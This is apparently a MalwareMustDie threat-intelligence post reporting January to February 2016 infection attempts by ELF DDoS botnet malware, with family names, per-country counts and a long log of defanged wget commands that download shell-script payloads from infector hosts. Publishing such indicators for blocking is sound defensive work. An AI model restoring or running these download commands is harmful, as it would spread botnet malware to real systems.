Sunday, February 7, 2016

MMD-0052-2016 - SkidDDOS ELF infection Jan-Feb 2016

Background

This post presents comprehensive statistical data on infections by the ELF DDoS malware whose source code we obtained and reported in the previous MalwareMustDie blog post [MMD-0044-2015]. Some of the compiled ELF binaries are only slightly obfuscated or trivially "crypted", but they are easy to crack, and you can figure them out using the source code patterns I shared.

The IP addresses listed here are the infector hosts, which can be: (1) hosting hired by DDoS skiddies to spread these ELF binaries, or (2) infected servers/routers/IoT devices/VPSes that are being used to spread this ELF malware. Either way, these are bad hosts that should either be blocked before they are taken down, or be cleaned up. Generating IOCs or blocking rules based on this list is highly recommended.

The intelligence behind this information cannot be disclosed further for security reasons. The data belongs to MalwareMustDie, NPO (thank you to our ELF Team teammate for the hard work) and is bound by our disclaimer. Still, please feel free to extract IOCs to prevent these infections from getting worse, or use the just-released OTX IOC pulse. IDS/IPS/firewall/web filtering signature makers, please use the data at will.

No malicious infection can occur from viewing this post: the information is posted entirely in textual form and was modified in a way that prevents links to the outside, so it is harmless. Furthermore, this blog is hosted on Google (thank you blogger.com) infrastructure and not on our own servers.

The report of infection from 1st Jan - Feb 7th 2016

1. The summary:

Malware binary types: ELF/multiple architecture
Malware type: GayFgt(LizKebab), Kaiten (STD/Bossa/Mod)
Suspected actors: Lizard Stresser rings, aka: Sindicate, "Loony" Squad, and so on.
Total attempts: 1,158
Main download method: wgxt
Alternative download: cuxl; xxtch ; xxx-xxwnload
Download source per country:
  ------------------------
  No  Country      Count
  ------------------------
  1.  United States  39
  2.  Netherlands    12
  3.  United Kingdom 4
  4.  Latvia         3
  5.  France         3
  6.  Ukraine        1
  7.  Romania        1
  8.  Singapore      1
  9.  Poland         1
  10. Sweden         1
  11. China          1
  12. Russian        1
  13. Germany        1
  14. Moldova        1
  ------------------------

2. Interactive Map:

Powered by my friend JC SoCal's cool GIPC.

3. CSV GeoIP Database:


4. CSV Network Routing Database


5. Log of infection attempts time stamp (as cyber incident evidence):

2016-01-22 19:47:24 | wget hxxp:// 178.19.111.244/y . sh
2016-01-22 19:27:17 | wget hxxp:// 178.19.111.244/y . sh
2016-01-22 19:27:15 | wget hxxp:// 178.19.111.244/y . sh
2016-01-22 17:50:05 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 16:44:18 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 15:56:34 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 05:51:56 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-22 03:24:22 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-21 22:10:20 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-21 17:49:26 | wget hxxp:// iplogger.xyz/DOGDICKS/Binarys . sh
2016-01-21 16:21:59 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-21 13:52:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 13:52:01 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 07:26:36 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-21 07:02:10 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-21 03:22:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 03:09:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 02:28:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 02:24:19 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 02:10:30 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-20 23:57:05 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-20 22:32:51 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 21:56:08 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 21:49:01 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 21:38:36 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 21:07:50 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 20:33:28 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 17:10:47 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 16:13:02 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 10:49:05 | wget hxxp:// 198.23.238.251/gb . sh
2016-01-20 09:41:22 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 09:34:12 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 07:07:37 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 06:51:52 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 06:41:03 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 06:01:47 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 05:46:11 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 05:14:29 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 05:13:02 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 05:02:00 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 04:11:57 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 03:57:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 03:13:32 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 03:05:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 02:27:34 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 02:19:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 01:42:34 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 01:27:42 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 01:14:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 00:35:57 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 00:24:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 23:58:11 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-19 23:19:08 | wget 192.227.170.67/bins . sh
2016-01-19 22:04:11 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 22:01:31 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-19 21:44:34 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 21:21:10 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 21:04:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 20:13:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 16:09:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 15:21:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 15:12:13 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-19 15:12:13 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-19 14:56:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 14:11:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 08:30:58 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 07:58:19 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 04:32:58 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:52:38 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:37:52 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:09:10 | wget hxxp:// 158.69.217.211/gb . sh
2016-01-19 02:03:04 | wget hxxp:// 158.69.217.211/gb . sh
2016-01-18 22:37:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 22:31:33 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 21:48:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 19:16:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 19:09:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:33:30 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:26:36 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 18:25:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:08:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 17:47:42 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 17:35:26 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 16:14:46 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 15:50:46 | wget hxxp:// www.hongcherng.com/rd/rd . sh-O /tmp/ich . sh
2016-01-18 15:08:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 14:59:57 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 14:24:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 05:23:27 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 04:21:59 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 03:31:26 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-18 02:47:49 | wget hxxp:// binarys.x10.mx/king/Binarys . sh
2016-01-18 02:31:48 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 02:23:52 | wget hxxp:// binarys.x10.mx/king/Binarys . sh
2016-01-18 02:21:28 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-18 02:15:19 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 01:32:08 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-18 01:31:53 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-18 01:07:15 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 23:48:52 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 22:39:13 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-17 22:30:53 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-17 21:35:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 21:21:12 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 21:08:24 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 20:18:45 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 19:45:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 18:54:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 18:13:59 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 17:57:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 17:03:06 | wget hxxp:// 94.102.49.197/gb-wget . sh
2016-01-17 09:51:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 09:15:53 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 08:37:10 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 06:42:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 05:59:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 01:47:52 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-17 00:39:05 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-16 23:41:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 23:13:19 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 23:09:42 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 22:54:36 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 22:49:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 22:23:13 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 22:15:45 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 20:16:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 20:09:38 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 18:43:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 18:33:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 18:07:11 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 17:46:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 17:37:08 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 16:49:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 16:39:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 15:29:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 15:19:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 13:13:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 13:03:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 08:12:22 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-16 08:12:20 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-16 02:50:01 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 23:40:54 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 23:06:34 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 22:56:19 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 22:37:03 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 22:32:13 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 22:20:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 21:20:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 21:09:53 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 21:02:27 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-15 19:44:51 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-15 19:14:54 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 18:26:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 18:15:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 17:31:26 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 17:17:24 | wget hxxp:// www.hongcherng.com/rd/rd . sh-O /tmp/ich . sh
2016-01-15 16:43:10 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 15:26:25 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-15 14:13:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 14:03:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 12:40:26 | wget -q hxxp:// 162.208.8.203/p . sh
2016-01-15 07:31:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 07:21:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 07:14:50 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 06:44:14 | wget hxxp:// 216.158.225.7/gtop . sh
2016-01-15 02:38:27 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 02:36:06 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 02:22:57 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 02:05:36 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 01:43:57 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 01:27:01 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 00:43:06 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 00:27:16 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-15 00:12:57 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 23:48:37 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:53:28 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:45:16 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:03:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 21:53:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 21:39:11 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 20:55:24 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 20:26:48 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 17:59:24 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-14 17:45:01 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 17:03:32 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 15:24:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 15:14:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 15:01:20 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 14:45:57 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 14:15:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 14:05:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 13:54:38 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 13:43:29 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 10:37:24 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-14 10:37:22 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-14 08:54:03 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-14 00:52:25 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 00:05:18 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-13 22:22:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 22:12:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 21:44:02 | wget ftx://79.143.181.158/gtop . sh
2016-01-13 21:19:52 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 21:16:50 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-13 19:46:09 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 16:48:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 16:38:50 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 16:23:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 16:14:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 15:32:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 15:22:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 15:05:41 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-13 14:31:12 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 14:16:54 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 14:10:12 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 14:09:33 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 13:23:35 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 13:23:33 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 13:18:01 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-13 12:40:02 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 12:39:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 10:35:24 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 08:02:52 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 07:21:22 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 07:03:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 06:05:58 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 02:46:30 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-13 02:26:53 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 02:11:42 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 01:20:37 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-13 01:17:04 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 00:35:44 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-13 00:27:29 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-12 23:46:54 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-12 21:44:13 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-12 20:25:49 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-12 16:53:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 16:43:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 16:20:13 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 16:10:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 14:53:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 14:43:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 13:02:02 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 12:52:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 11:30:47 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:22:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:22:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:04:48 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:04:48 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 10:50:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 10:50:29 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 08:50:05 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 07:53:17 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 05:53:28 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-12 04:49:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 04:40:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 04:31:34 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 03:29:42 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 02:14:17 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-12 02:14:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-12 01:45:01 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-11 23:11:53 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 23:02:44 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 23:02:43 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:45:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:45:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:36:13 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-11 22:32:27 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:32:27 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 21:48:17 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:48:15 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:25:01 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:21:29 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-11 19:17:44 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-11 18:46:32 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 18:36:28 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 17:50:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 17:40:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 14:26:05 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-11 14:11:40 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 14:11:40 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 14:00:46 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 14:00:46 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:59:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 13:54:43 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:54:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:51:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:51:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:49:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 13:44:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:44:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:34:46 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:34:46 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 12:25:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 12:15:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 08:38:34 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:38:33 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:38:20 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:28:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:28:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:22:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-11 08:22:57 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-11 08:11:02 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:11:02 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:57:54 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:57:54 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:45:45 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:45:45 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:45:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:45:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:32:20 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:32:20 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 06:43:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 06:33:26 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 05:45:37 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 05:35:45 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 05:01:02 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 04:51:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 03:43:58 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 03:34:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 03:06:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 02:57:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 02:34:40 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 02:25:01 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 01:06:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:57:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:49:38 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:42:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:42:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:34:05 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-11 00:28:19 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:28:19 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:13:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:04:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 23:18:31 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-10 23:16:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 23:06:26 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 22:31:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 21:56:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
